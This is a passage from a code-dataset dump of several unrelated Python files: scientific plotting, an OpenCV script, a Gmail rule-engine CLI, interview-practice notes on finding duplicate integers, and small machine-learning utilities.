'winter')\r\n \r\n #get QU data in velocity space for red region of lines\r\n if comp_color == 'red':\r\n reg = get_lines(bindata, region[1], region[2])\r\n reg_vel = get_vel_column(reg, region[1])\r\n reg_qu = QU(reg_vel, ax = ax, color_data = reg_vel['vel'], cmap_choice = 'spring')\r\n \r\n if comp_color == 'whole_region':\r\n reg = get_lines(bindata, region[0], region[2])\r\n reg_vel = get_vel_column(reg, region[1])\r\n reg_qu = QU(reg_vel, ax = ax, color_data = reg_vel['vel'], cmap_choice = 'turbo')\r\n \r\n plt.subplots_adjust(left=0, bottom=0, right=.85, top=.99, wspace=0.01, hspace=0.13)\r\n cbar_ax = fig.add_axes([.85, 0.5, 0.02, 0.5])\r\n fig.colorbar(reg_qu, cax=cbar_ax).set_label('Velocity(km/s)', rotation= 90) \r\n return()\r\n\r\ndef make_gif(file_list, movie_name, slide_time):\r\n \"\"\"makes a gif out of files provided in the file_list. \r\n the Gif is saved under the movie_name.GIF (make sure to include .GIF at the end of the movie name) \r\n and the slide_time specifies how long to spend on each image\"\"\"\r\n \r\n images = []\r\n\r\n for filename in file_list:\r\n images.append(imageio.imread(filename))\r\n imageio.mimsave(str(movie_name), images, duration = slide_time)\r\n return(print(\"GIF saved\"))\r\n\r\n","repo_name":"sablol/SNe_codes","sub_path":"plot_codes.py","file_name":"plot_codes.py","file_ext":"py","file_size_in_byte":30311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"8341023627","text":"from plotly.offline import iplot, init_notebook_mode\nimport plotly.graph_objs as go\nimport plotly.io as pio\ninit_notebook_mode(connected=True)\nimport itertools\ncombinations=list(itertools.product(list(log_rep.columns), list(log_rep.columns))) # all combinations of two lists as a tuple\ntrans_tabels=[log_rep.T,df_step_2.T,df_step_3.T,df_step_4.T, df_step_5.T] # Transition matrices \n\ntraces = [go.Scatter(\n x = np.arange(0, 5, 1),\n y=[df.loc[i] for df in trans_tabels],\n mode = 'markers+lines',\n name = str(i)\n ) for i in combinations]\n\nupdatemenus_ = list([\n dict(\n buttons = list([\n dict(\n args=['visible', True],\n label='show',\n method='restyle'\n ),\n dict(\n args=['visible', 'legendonly'],\n label='hide',\n method='restyle'\n )\n ]),\n direction = 'right',\n pad = {'r': 10, 't': 10},\n showactive = True,\n type = 'buttons',\n x = 0.5,\n xanchor = 'right',\n y = 1.1,\n yanchor = 'top'\n ),\n])\n\nlayout = go.Layout(\n title = 'Transition probabilities within five steps for each transistion of people with repetitive behaviour'\n)\n\nlayout['updatemenus'] = updatemenus_\n\nfig = go.Figure(data=traces,layout=layout)\npyo.iplot(fig, filename='Transition_probabilities.html')\n","repo_name":"Arsova/Plotly_Dashbords_and_examples","sub_path":"Buttons_hide_show_full_legend.py","file_name":"Buttons_hide_show_full_legend.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"14527598614","text":"#!/usr/bin/env python3\n\nimport cv2\nimport numpy as np\nimport time\nimport sys\n\nimg1_path = ''\nimg2_path = ''\n\nimg1 = cv2.imread (img1_path, 1)\nimg2 = cv2.imread (img2_path, 1)\n\nif img1 is None or img2 is None:\n print (\"ERROR!!: Unable to read one of the images\")\n sys.exit (-1)\n\ngray1 = cv2.cvtColor (img1, cv2.COLOR_BGR2GRAY)\n_, mask1 = cv2.threshold (gray1, 1, 255, cv2.THRESH_BINARY)\n\ngray2 = cv2.cvtColor (img2, cv2.COLOR_BGR2GRAY)\n_, mask2 = cv2.threshold (gray2, 1, 255, cv2.THRESH_BINARY)\n\nbd = cv2.line_descriptor.BinaryDescriptor_createBinaryDescriptor ()\n\nkeylines1, descriptors1 = bd.detect (gray1, mask1, False, False)\nkeylines2, descriptors2 = bd.detect (gray2, mask2, False, False)\n\nlbd_octave1 = []\nlbd_octave2 = []\n","repo_name":"ksakash/py_exp","sub_path":"line_stitch.py","file_name":"line_stitch.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"3723539105","text":"\"\"\"Main file to start application.\n\n@file mail_helper.py\n@author Dilip Kumar Sharma\n@date 19th July 2023\n\nAbout; -\n--------\n It is responsible for starting app.\n\n This class implements arg parser to provide command line arguments.\n\n This module works as a starting point for our application.\n This modules drives all other operations like validations, intialization, fetching emails and applying rules.\n\"\"\"\n# Core python packages\nimport os\nimport json\nimport argparse\nfrom enum import IntEnum\nfrom dataclasses import dataclass\n\n# Application packages\nfrom src.initialize import (\n init_credential_json,\n create_ftsi,\n check_ftsi,\n validate_auth,\n)\nfrom src import environment\nfrom src import create_log_directory\nfrom src.rule_engine.rule_parser import RuleParser\nfrom src.mail_engine.mail_engine import MailEngine\nfrom src.rule_engine.rule_validation import RuleValidation\nfrom src.rule_engine.rule_engine import RuleEngine\nfrom src.utils.api_logger import ApiLogger\nfrom src.utils.file_helper import delete_file\nfrom src.data_layer.db_validation import check_db_connection\nfrom src.initialize import auth, un_auth\n\n\nclass ArgOption(IntEnum):\n VALIDATE = 1\n AUTH = 2\n UNAUTH = 3\n EMAIL = 4\n SHOW_RULES = 5\n APPLY_RULES = 6\n\n\nclass CommandInterface:\n \"\"\"\n Command line support for the application\n \"\"\"\n\n def __init__(self) -> None:\n self.parser = None\n\n @dataclass\n class Choice:\n option: ArgOption = 1\n rule: str = None\n\n def initialize_cmd(self) -> None:\n \"\"\"\n To initialize arg parser\n \"\"\"\n self.parser = argparse.ArgumentParser(\n prog=\"mail_helper\",\n description=\"List the cmd parameters for mail helper\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n epilog=\"Thanks for using %(prog)s! :)\",\n )\n\n def create_arguments(self, available_rules: list) -> None:\n \"\"\"\n To create command line arguments.\n\n Args:\n available_rules (list): List of rules as defined in email_rules.json\n \"\"\"\n group = self.parser.add_mutually_exclusive_group()\n\n group.add_argument(\n \"-v\",\n \"--validate\",\n default=False,\n action=\"store_true\",\n help=\"To do baisc validiation for db connection.\",\n )\n\n group.add_argument(\n \"-a\",\n \"--auth\",\n default=False,\n action=\"store_true\",\n help=\"To do authentication with gmail api.\",\n )\n\n group.add_argument(\n \"-u\",\n \"--unauth\",\n default=False,\n action=\"store_true\",\n help=\"To do un-authentication with gmail api.\",\n )\n\n group.add_argument(\n \"-e\",\n \"--email\",\n default=False,\n action=\"store_true\",\n help=\"To fetch emails from Gmail\",\n )\n\n group.add_argument(\n \"-s\",\n \"--showrules\",\n choices=available_rules + [\"all\"],\n help=\"Show all the available rules. Select all for all rules or select a particular rule\",\n nargs=1,\n type=str,\n )\n\n group.add_argument(\n \"-ar\",\n \"--applyrule\",\n choices=available_rules,\n help=\"Apply given rule by its name with value from json key 'rule'\",\n nargs=1,\n type=str,\n )\n\n def get_choice(self, available_rules: list) -> Choice:\n \"\"\"\n Get the choice selected by user in CMD.\n\n Args:\n available_rules (list): List of rules as defined in email_rules.json\n\n Returns:\n Choice: Choice selected by user\n \"\"\"\n self.create_arguments(available_rules=available_rules)\n\n choice = CommandInterface.Choice()\n args = self.parser.parse_args()\n\n if args.validate:\n choice.option = ArgOption.VALIDATE\n elif args.auth:\n choice.option = ArgOption.AUTH\n elif args.unauth:\n choice.option = ArgOption.UNAUTH\n elif args.email:\n choice.option = ArgOption.EMAIL\n elif args.showrules:\n choice.option = ArgOption.SHOW_RULES\n choice.rule = args.showrules[0]\n else:\n choice.option = ArgOption.APPLY_RULES\n choice.rule = args.applyrule[0]\n\n return choice\n\n\nclass MailHelper:\n def __init__(self) -> None:\n self.rule_parser = None\n self.rule_validation = None\n\n def initialize(self) -> None:\n \"\"\"\n Do all initialization related task.\n \"\"\"\n print(\"Creating log directory\")\n create_log_directory()\n\n rule_file_path = os.path.join(\n os.getcwd(), \"configuration\", environment, \"email_rules.json\"\n )\n\n self.rule_parser = RuleParser(rule_file_path)\n self.rule_parser.parse() # Parse email_rules.json file\n self.rule_validation = RuleValidation(self.rule_parser)\n\n # Read gmail credentials from .env file and write them to a json file because\n # gmail api uses .json file to read credentials.\n init_credential_json()\n\n def init_cmd(self) -> None:\n \"\"\"\n To initialize CMD parser.\n \"\"\"\n print(\"************************ Mail Helper CLI ************************\")\n\n self.cli.initialize_cmd()\n\n @check_db_connection\n def validate(self) -> None:\n \"\"\"\n Triggers all validations.\n Like DB connection and validation related to email_rules.json file.\n \"\"\"\n # Validate rule parser data\n self.rule_validation.verify_rules()\n print(\"All validations are done, please proceed.\")\n\n def show_rules(self, rule: str) -> None:\n \"\"\"\n To show rules available in email_rules.json file.\n Args:\n rule (str): Name of the rule from 'rule' attribute from email_rules.json file.\n \"\"\"\n ApiLogger.log_info(f\"Show rule '{rule}'.\")\n\n if rule == \"all\":\n print(json.dumps(self.rule_parser.get_all(), indent=1))\n else:\n print(json.dumps(self.rule_parser.get_rule(rule), indent=1))\n\n @check_db_connection\n @validate_auth\n def start_mail_engine(self) -> None:\n \"\"\"\n Triggers downloading emails, writing to database and creating full text search indexes.\n Full text search indexes are created post inserting data into tables to improve performance.\n\n Before triggering the flow, we validate we are connected to db and auth flow is completed.\n \"\"\"\n ApiLogger.log_debug(\"Starting Mail Engine.\")\n\n self.mail_engine = MailEngine()\n self.mail_engine.start()\n\n ApiLogger.log_info(\"Creating full text search indexes.\")\n create_ftsi()\n\n @check_db_connection\n @validate_auth\n @check_ftsi\n def start_rule_engine(self, rule: str) -> None:\n \"\"\"\n Triggers applying email rules from email_rules.json.\n\n Before triggering the flow, we validate we are connected to db, auth flow is completed\n and full text search indexes are created.\n\n Args:\n rule (str): The selected rule to apply.\n \"\"\"\n ApiLogger.log_debug(\"Starting Rule Engine for rulr {rule}.\")\n\n rule_data = self.rule_parser.get_rule(rule)\n rule_engine = RuleEngine()\n\n rule_engine.start(rule_data)\n\n def start(self) -> None:\n \"\"\"\n Starting point for our application.\n \"\"\"\n self.initialize()\n self.init_cmd()\n\n ApiLogger.log_info(\"Get the choice selected by user from command line.\")\n choice = self.cli.get_choice(self.rule_parser.get_available_rules())\n\n self.validate()\n\n if choice.option == ArgOption.AUTH:\n auth()\n if choice.option == ArgOption.UNAUTH:\n un_auth()\n elif choice.option == ArgOption.EMAIL:\n self.start_mail_engine()\n elif choice.option == ArgOption.SHOW_RULES:\n self.show_rules(choice.rule)\n elif choice.option == ArgOption.APPLY_RULES:\n self.start_rule_engine(choice.rule)\n\n def clean_up(self) -> None:\n \"\"\"\n Do necessary clean up required.\n \"\"\"\n pass # TBD\n\n\nif __name__ == \"__main__\":\n mail_helper = MailHelper()\n\n mail_helper.cli = CommandInterface()\n mail_helper.start()\n mail_helper.clean_up()\n print(\"*********** Application Ended *********************\")\n","repo_name":"vyavasthita/mail-integration","sub_path":"mail_helper.py","file_name":"mail_helper.py","file_ext":"py","file_size_in_byte":8530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"23205557486","text":"import json\n\ndef read_json(file_input):\n '''read the output json'''\n f = open(file_input)\n graph_liaison_read = json.load(f)\n return graph_liaison_read\n\ndef add_drug_number_to_journal_dict(dict_input, key):\n '''append drug number to the given journal'''\n if key in dict_input.keys():\n new_value = dict_input[key] + 1\n dict_input[key] = new_value\n else: \n dict_input.update({key : 1})\n return dict_input\n\ndef journals_more_drugs_publish(json_graph_liaiason_file):\n '''return the journals with the most of drugs publications'''\n graph_liaison_read = read_json(json_graph_liaiason_file)\n drug_values = list(graph_liaison_read.values())\n dict_journals = {}\n for i in (range(len(drug_values))):\n lst_drug_journals = []\n for elem in drug_values[i]['journals']:\n lst_drug_journals.append(elem[0].replace('\\\\xc3\\\\x28', ''))\n for key in set(lst_drug_journals):\n add_drug_number_to_journal_dict(dict_journals, key )\n max_keys = [key for key, value in dict_journals.items() if value == max(dict_journals.values())]\n return(max_keys)","repo_name":"yelmaataoui/piepdata_poc","sub_path":"post_treatment_feature_utils.py","file_name":"post_treatment_feature_utils.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"7111126037","text":"\"\"\"\nFind a duplicate, Space Edition™. [see PDF]\n\nWe have a list of integers, where:\n1. The integers are in the range 1..n\n2. The list has a length of n+1\n\nIt follows that our list has at least one integer which appears at least twice. But it may have several duplicates, and each duplicate may appear more than twice.\n\nWrite a function which finds an integer that appears more than once in our list. (If there are multiple duplicates, you only need to find one of them.)\n\nWe're going to run this function on our new, super-hip MacBook Pro With Retina Display™. Thing is, the damn thing came with the RAM soldered right to the motherboard, so we can't upgrade our RAM. So we need to optimize for space!\n\"\"\"\n\n# Editor Code\nimport unittest\n\n\ndef find_repeat(numbers):\n\n # Find a number that appears more than once\n\n\n return 0\n\n\n\n# Tests\n\nclass Test(unittest.TestCase):\n\n def test_just_the_repeated_number(self):\n actual = find_repeat([1, 1])\n expected = 1\n self.assertEqual(actual, expected)\n\n def test_short_list(self):\n actual = find_repeat([1, 2, 3, 2])\n expected = 2\n self.assertEqual(actual, expected)\n\n def test_medium_list(self):\n actual = find_repeat([1, 2, 5, 5, 5, 5])\n expected = 5\n self.assertEqual(actual, expected)\n\n def test_long_list(self):\n actual = find_repeat([4, 1, 4, 8, 3, 2, 7, 6, 5])\n expected = 4\n self.assertEqual(actual, expected)\n\n\nunittest.main(verbosity=2)\n\n\n# My attempted solution:\ndef duplicates(nums):\n seen = set()\n for num in nums:\n if num in seen:\n return num\n else:\n seen.add(num)\n\n\n\"\"\"\nGotchas:\nWe can do this in O(1) space.\n\nWe can do this in less than O(n^2) time while keeping O(1) space.\n\nWe can do this in O(n*logn) time and O(1) space.\n\nWe can do this without destroying the input.\n\nMost O(n*logn) algorithms double something or cut something in half. How can we rule out half of the numbers each time we iterate through the list?\n\n\"\"\"\n\n# Breakdown:\n# This one's a classic! We just do one walk through the list, using a set to keep track of which items we've seen!\n\ndef find_repeat(numbers):\n numbers_seen = set()\n for number in numbers:\n if number in numbers_seen:\n return number\n else:\n numbers_seen.add(number)\n\n # Whoops--no duplicate\n raise Exception('no duplicate!')\n\n# Bam. O(n) time and ... O(n) space ...\n# Right, we're supposed to optimize for space. O(n) is actually kinda high space-wise. Hm. We can probably get O(1)...\n\n\n# Solution:\n# We can \"brute force\" this by taking each number in the range 1..n and, for each, walking through the list to see if it appears twice.\n\ndef find_repeat_brute_force(numbers):\n for needle in range(1, len(numbers)):\n has_been_seen = False\n for number in numbers:\n if number == needle:\n if has_been_seen:\n return number\n else:\n has_been_seen = True\n\n # Whoops--no duplicate\n raise Exception('no duplicate!')\n\n# This is O(1) space and O(n^2) time.\n# That space complexity can't be beat, but the time cost seems a bit high. Can we do better?\n\n\"\"\"\nOne way to beat O(n^2) time is to get O(n*logn) time. Sorting takes O(nlgn) time. And if we sorted the list, any duplicates would be right next to each-other!\n\nBut if we start off by sorting our list we'll need to take O(n) space to store the sorted list...\n\n...unless we sort the input list in place!\n An in-place algorithm operates directly on its input and changes it, instead of creating and returning a new object. This is sometimes called destructive, since the original input is \"destroyed\" when it's edited to create the new output.\n\n Careful: \"In-place\" does not mean \"without creating any additional variables!\" Rather, it means \"without creating a new copy of the input.\" In general, an in-place function will only create additional variables that are O(1) space.\n\n Here are two functions that do the same operation, except one is in-place and the other is out-of-place:\n\n def square_list_in_place(int_list):\n for index, element in enumerate(int_list):\n int_list[index] *= element\n\n # NOTE: We could make this function just return, since\n # we modify int_list in place.\n return int_list\n\n\n def square_list_out_of_place(int_list):\n # We allocate a new list with the length of the input list\n squared_list = [None] * len(int_list)\n\n for index, element in enumerate(int_list):\n squared_list[index] = element ** 2\n\n return squared_list\n\n Working in-place is a good way to save space. An in-place algorithm will generally have O(1) space cost.\n\n But be careful: an in-place algorithm can cause side effects. Your input is \"destroyed\" or \"altered,\" which can affect code outside of your function. For example:\n\n original_list = [2, 3, 4, 5]\n squared_list = square_list_in_place(original_list)\n\n print(\"squared: %s\" % squared_list)\n # Prints: squared: [4, 9, 16, 25]\n\n print(\"original list: %s\" % original_list)\n # Prints: original list: [4, 9, 16, 25], confusingly!\n\n # And if square_list_in_place() didn't return anything,\n # which it could reasonably do, squared_list would be None!\n\n Generally, out-of-place algorithms are considered safer because they avoid side effects. You should only use an in-place algorithm if you're very space constrained or you're positive you don't need the original input anymore, even for debugging.\n\nOkay, so this'll work:\n1. Do an in-place sort of the list (for example an in-place merge sort).\n2. Walk through the now-sorted list from left to right.\n2. Return as soon as we find two adjacent numbers which are the same.\nThis'll keep us at O(1) space and bring us down to O(nlgn) time.\n\nBut destroying the input is kind of a drag--it might cause problems elsewhere in our code. Can we maintain this time and space cost without destroying the input?\n\nLet's take a step back. How can we break this problem down into subproblems?\n\nIf we're going to do O(n*logn) time, we'll probably be iteratively doubling something or iteratively cutting something in half. That's how we usually get a \"logn\". So what if we could cut the problem in half somehow?\n\nWell, binary search [A binary search algorithm finds an item in a sorted list in O(log(n)) time.] works by cutting the problem in half after figuring out which half of our input list holds the answer.\n\nBut in a binary search, the reason we can confidently say which half has the answer is because the list is sorted. For this problem, when we cut our unsorted list in half we can't really make any strong statements about which elements are in the left half and which are in the right half.\n\nWhat if we could cut the problem in half a different way, other than cutting the list in half?\n\nWith this problem, we're looking for a needle (a repeated number) in a haystack (list). What if instead of cutting the haystack in half, we cut the set of possibilities for the needle in half?\n\nThe full range of possibilities for our needle is 1..n. How could we test whether the actual needle is in the first half of that range (1..n/2) or the second half (n/2+1..n)?\n\nA quick note about how we're defining our ranges: when we take n/2 we're doing integer division, so we throw away the remainder. To see what's going on, we should look at what happens when n is even and when n is odd:\n- If n is 6 (an even number), we have ... so our ranges are 1..3 and 4..6\n- If n is 5 (an odd number), ... so our ranges are 1..2 and 3..5\n​\nSo we can notice a few properties about our ranges:\n1. They aren't necessarily the same size.\n2. They don't overlap.\n2. Taken together, they represent the original input list's range of 1..n. In math terminology, we could say their union is 1..n.\n\nSo, how do we know if the needle is in the first half or the second half?\n\nThink about the original problem statement. We know that we have at least one repeat because there are n+1 items and they are all in the range 1..n, which contains only n distinct integers.\n\nThis notion of \"we have more items than we have possibilities, so we must have at least one repeat\" is pretty powerful. It's sometimes called the pigeonhole principle. [The pigeonhole principle states that if nn items are put into mm containers, with n > mn>m, then at least one container must contain more than one item. For example, there must be at least two left gloves or two right gloves in a group of three gloves.] Can we exploit the pigeonhole principle to see which half of our range contains a repeat?\n\nImagine that we separated the input list into two sublists—one containing the items in the range of the first half and the other containing the items in the range of the second half.\n​\nEach sublist has a number of elements as well as a number of possible distinct integers (that is, the length of the range of possible integers it holds).\n\nGiven what we know about the number of elements vs the number of possible distinct integers in the original input list, what can we say about the number of elements vs the number of distinct possible integers in these sublists?\n\"\"\"\n\n\"\"\"\nComplexity:\nO(1) space and O(n*logn) time.\n\nTricky as this solution is, we can actually do even better, getting our runtime down to O(n) while keeping our space cost at O(1). The solution is NUTS; it's probably outside the scope of what most interviewers would expect. But for the curious...(here it is)[link]!\n\n\nBonus:\nThis function always returns one duplicate, but there may be several duplicates. Write a function that returns all duplicates.\n\"\"\"\n","repo_name":"zarkle/code_challenges","sub_path":"codility/interviewcake/Find_Duplicate_Space.py","file_name":"Find_Duplicate_Space.py","file_ext":"py","file_size_in_byte":9722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"19056635937","text":"import torch\nimport torch.nn as nn\n\n\nclass Convnet(nn.Module):\n\n def __init__(self, x_dim=3, hid_dim=64, z_dim=64):\n super().__init__()\n self.encoder = nn.Sequential(\n conv_block(x_dim, hid_dim),\n conv_block(hid_dim, hid_dim),\n conv_block(hid_dim, hid_dim),\n conv_block(hid_dim, z_dim),\n )\n self.out_channels = 1600\n\n def forward(self, x):\n x = self.encoder(x)\n return x.view(x.size(0), -1)\n\n\ndef conv_block(in_channels, out_channels):\n bn = nn.BatchNorm2d(out_channels)\n nn.init.uniform_(bn.weight)\n return nn.Sequential(\n nn.Conv2d(in_channels, out_channels, 3, padding=1),\n bn,\n nn.ReLU(),\n nn.MaxPool2d(2)\n )\n\n\ndef cosine_similarity(a, b):\n n = a.shape[0]\n m = b.shape[0]\n a = a.unsqueeze(1).expand(n, m, -1)\n b = b.unsqueeze(0).expand(n, m, -1)\n cos = nn.CosineSimilarity(dim=2, eps=1e-6)\n return cos(a, b)\n\n\nclass ParametricDist(nn.Module):\n def __init__(self):\n super().__init__()\n self.dist = nn.Sequential(\n nn.Linear(1600, 64),\n nn.ReLU(),\n nn.Linear(64, 32),\n nn.ReLU(),\n nn.Linear(32, 1),\n nn.ReLU(),\n )\n\n def forward(self, a, b):\n n = a.shape[0]\n m = b.shape[0]\n a = a.unsqueeze(1).expand(n, m, -1)\n b = b.unsqueeze(0).expand(n, m, -1)\n return self.dist(a-b).squeeze(-1)\n\n\ndef euclidean_metric(a, b):\n n = a.shape[0]\n m = b.shape[0]\n a = a.unsqueeze(1).expand(n, m, -1)\n b = b.unsqueeze(0).expand(n, m, -1)\n logits = -((a - b) ** 2).sum(dim=2)\n # since our goal is to minimize the loss\n # => place negative sign to distance\n # => the closer the distance, the smaller the loss\n return logits\n\n\nif __name__ == '__main__':\n # from torchsummary import summary\n #\n # net = Convnet()\n # net.to('cuda')\n # summary(net, (3, 84, 84))\n # r = torch.randn(1, 3, 84, 84, device=\"cuda\")\n # print(net(r).size())\n\n # v1 = torch.Tensor([[-0.7715, -0.6205, -0.2562]])\n # v2 = torch.Tensor([[-1.7715, -0.6205, -0.2562]])\n # v3 = torch.Tensor([[-2.7715, -0.6205, -0.2562]])\n #\n # print(cosine_similarity(v1, v2)) # 0.93\n # print(cosine_similarity(v1, v3)) # 0.8877\n # print(cosine_similarity(v2, v3))\n # print(cosine_similarity(v1, v1))\n\n # logits = torch.Tensor([[0.9, 0.05, 0.05]])\n # label = torch.Tensor([0]).long()\n # criterion = nn.CrossEntropyLoss()\n # loss = criterion(logits, label)\n # print(loss)\n\n v1 = torch.randn(1, 1600)\n v2 = torch.randn(10, 1600)\n\n dist = ParametricDist()\n output = dist(v1, v2)\n # print(output.size())\n # print(output[0])\n print(dist)\n # output2 = euclidean_metric(v1, v2)\n # print(output2.size())\n # print(output2[0])\n #\n # output3 = cosine_similarity(v1, v2)\n # print(output3.size())\n # print(output3[0])\n\n","repo_name":"m1stborn/DLCV2021","sub_path":"HW4/model_p1/convnet.py","file_name":"convnet.py","file_ext":"py","file_size_in_byte":2944,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"30305820425","text":"# get disaster names in string\ndisasterNames = uuidAnddisaster_name.values()\n\ndisasterNamesNotNone = []\ndisasterNameIsNoneUuid = []\n\nfor i,j in uuidAnddisaster_name.items():\n if len(j) > 0:\n disasterNamesNotNone.append(j)\n else:\n disasterNameIsNoneUuid.append(i)\n\ndisasterNamesString = []\nfor i in disasterNamesNotNone:\n for j in i:\n disasterNamesString.append(j)\n\n# get frequency of each disaster\ndisasterCnt = Counter(disasterNamesString)\ndisasterCntList = disasterCnt.items()\ndisasterCntSorted = sorted(disasterCntList,key=lambda tup: tup[1], reverse=True) # disasterCntSorted useful\n\n# each disaster and its related uuids\ndisasterAndUuid = {}\nfor i,j in uuidAnddisaster_name.items():\n if len(j) > 0:\n for k in j:\n if k in disasterAndUuid:\n disasterAndUuid[k].append(i)\n else:\n disasterAndUuid[k] = [i]\n\ndisasterAndUuidSorted = sorted(disasterAndUuid.items(), key=lambda x: len(x[1]), reverse=True)\n\ndisasterAndUuidSortedFinal = []\nfor i in disasterAndUuidSorted:\n disasterAndUuidSortedFinal.append((i[0], sorted(i[1],key=uuidAndDateTime.get))) # disasterAndUuidSortedFinal useful\n\ndisasterAndUuidSortedFinalDict = {}\nfor i in disasterAndUuidSortedFinal:\n disasterAndUuidSortedFinalDict[i[0]] = i[1]\n\nwith open('relatedDisasterDocs.json', 'w') as f:\n json.dump(disasterAndUuidSortedFinalDict, f)","repo_name":"zhtpandog/LORELEI","sub_path":"KDD/GroundTruth.py","file_name":"GroundTruth.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"45570397672","text":"\n# Leetcode practice\n# author: orange\n# date: 2021/6/12\n\n# 简单题目\n\nclass Solution:\n def nextGreatestLetter(self, letters, target: str):\n for i in range(len(letters)):\n if letters[i] > target:\n return letters[i]\n \n return letters[0]\n\nexample = Solution()\nletters = [\"c\",\"f\",\"j\"]\ntarget = \"g\"\noutput = example.nextGreatestLetter(letters,target)\nprint(output)","repo_name":"orange-eng/Leetcode","sub_path":"easy/744_Find_Smallest_Letter.py","file_name":"744_Find_Smallest_Letter.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"25068468518","text":"import math\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport torch\nimport copy\nfrom collections import defaultdict\n\nfrom Components.ConditionalNormalDistribution import ConditionalNormalDistribution\nfrom Components.DifferentiablePolynomial import DifferentiablePolynomial\nfrom Models.ModelExponential import ModelExponential\nfrom Models.ModelSinCos import ModelSinCos\nfrom Plotting.HeatMapLossFunction import *\nfrom Composition.SequentialSystem import SequentialSystem\nfrom SearchAlgorithm.skeleton import BO_skeleton, BO_graph, BO_graph_local_loss\n\nfrom helper import *\n#\n# # f = ConditionalNormalDistribution()\n# f = DifferentiablePolynomial() # black box function (comes second)\n# f.noisy_operation = lambda y, n:(1+n)*y # set multiplicative noise\n# g_A = ModelExponential() # white box function (comes first)\n# g_A.noisy_operation = lambda y, n:y+n # set addition noise\n# g_B = ModelSinCos() # white box function (comes last)\n# g_B.noisy_operation = lambda y, n:y+n # set addition noise\n#\n# ground_truth_theta_0_A = 1.6\n# ground_truth_theta_1_A = 1.2\n#\n# ground_truth_theta_0_B = 0.9\n# ground_truth_theta_1_B = 1.4\n#\n# # generate local dataset over g (first component A)\n# X_local = torch.tensor(np.random.uniform(1, 3, size=100))\n# X_global = X_local\n# y_local = g_A(X_local, params=[ground_truth_theta_0_A, ground_truth_theta_1_A], noisy = True, noise_mean = 0.0) # labeling effort of local\n# # pass into black box component\n# X_b = f(y_local, noisy = False) # ground truth, no noise in black box component\n# # generate local dataset over g2 (second component B)\n# system_output_no_perturbation = g_B(X_b, params=[ground_truth_theta_0_B, ground_truth_theta_1_B], noisy = True, noise_mean = 0.0) # labeling effort\n#\n# # generate end to end dataset (use same X)\n# X_global = X_local\n# z_global = system_output_no_perturbation\n#\n# # local gradient descent\n# all_theta_via_local = g_A.fit(X_local,y_local)\n# all_theta_via_local = g_B.fit(X_b,system_output_no_perturbation)\n#\n#\n# # create the system\n# s = SequentialSystem()\n#\n# s.addModel(g_A, X_local, y_local)\n# s.addComponent(f)\n# s.addModel(g_B, X_b, system_output_no_perturbation)\n# s.addGlobalData(X_global, z_global)\n#\n# # show parameters and local losses (components already have converged params from gradient descent)\n# print(s.get_parameters())\n# print(s.compute_local_loss())\n# print(s.compute_system_loss())\n#\n# # BO - parameters are resetted\n# all_theta_via_global, loss, param = BO_skeleton(s, objective=\"all\", model=\"single_task_gp\", printout=True)\n# print(\"local, system loss (best)\")\n# print(loss)\n# print(\"param\")\n# print(param)\n#\n# #plt, fig, ax = HeatMapLossFunction(X_local, y_local, X_global, z_global_pertubed, f, g, plt)\n#\n# #all_theta_via_global = s.fit_global_differentiable() # this performs end to end gradient descent\n# #\n# # all_theta_via_local = np.array(all_theta_via_local)\n# # all_theta_via_global = np.array(all_theta_via_global)\n# #\n# # ax[0].scatter(all_theta_via_local[:,0], all_theta_via_local[:,1], s=0.2,alpha=1, label=\"gradient climbing over local data set\")\n# # ax[0].scatter(all_theta_via_global[:,0], all_theta_via_global[:,1], s=1,alpha=1, label=\"end to end learning\")\n# # lgnd = ax[0].legend()\n# #\n# # ax[1].scatter(all_theta_via_local[:,0], all_theta_via_local[:,1], s=0.2,alpha=0.5)\n# # ax[1].scatter(all_theta_via_global[:,0], all_theta_via_global[:,1], s=1,alpha=0.5)\n# #\n# # plt.show()\n#\n#\n# # prediction_y = model(X_local.reshape(len(X_local),1))\n# # prediction_z_correct, prediction_z_pertubed = component.generate_both(prediction_y) # component is not perfect\n# #\n# # print(\"local loss: \", mean_squared_error(model(X_local.reshape(len(X_local),1)), y_local))\n# # print(\"system loss with erronous component: \", mean_squared_error(prediction_z_pertubed, z_local_ground_truth))\n# # print(\"system loss with correct component: \", mean_squared_error(prediction_z_correct, z_local_ground_truth))\n\n\nfrom GraphDecomposition.Heuristic import *\nfrom GraphDecomposition.DirectedFunctionalGraph import *\nfrom Components.DifferentiablePolynomial import *\nfrom Models.ModelSinCos import *\nfrom Models.ModelWeightedSum import *\nfrom Models.ModelExponential import *\n\nG = DirectedFunctionalGraph()\n#\n# G = nx.DiGraph()\n# G.add_node(0, idx=\"1\", component=ModelWeightedSum())\n# G.add_node(1, idx=\"1\", component=DifferentiablePolynomial())\n# G.add_node(2, idx=\"2\", component=ModelSinCos())\n# G.add_node(\"BlackboxB\", idx=\"3\", component=ModelWeightedSum())\n# G.add_node(8, idx=\"8\", component=DifferentiablePolynomial())\n# G.add_node(4, idx=\"4\", component=ModelSinCos())\n# G.add_node(5, idx=\"5\", component=ModelWeightedSum())\n# G.add_node(7, idx=\"7\", component=DifferentiablePolynomial())\n# G.add_node(\"exit\", idx=\"8\", component=ModelWeightedSum())\n# G.add_node(\"BlackboxA\", idx=\"6\", component=DifferentiablePolynomial())\n# G.add_node(6, idx=\"6\", component=ModelWeightedSum())\n#\n# G.add_edge(0, 2)\n# G.add_edge(1, 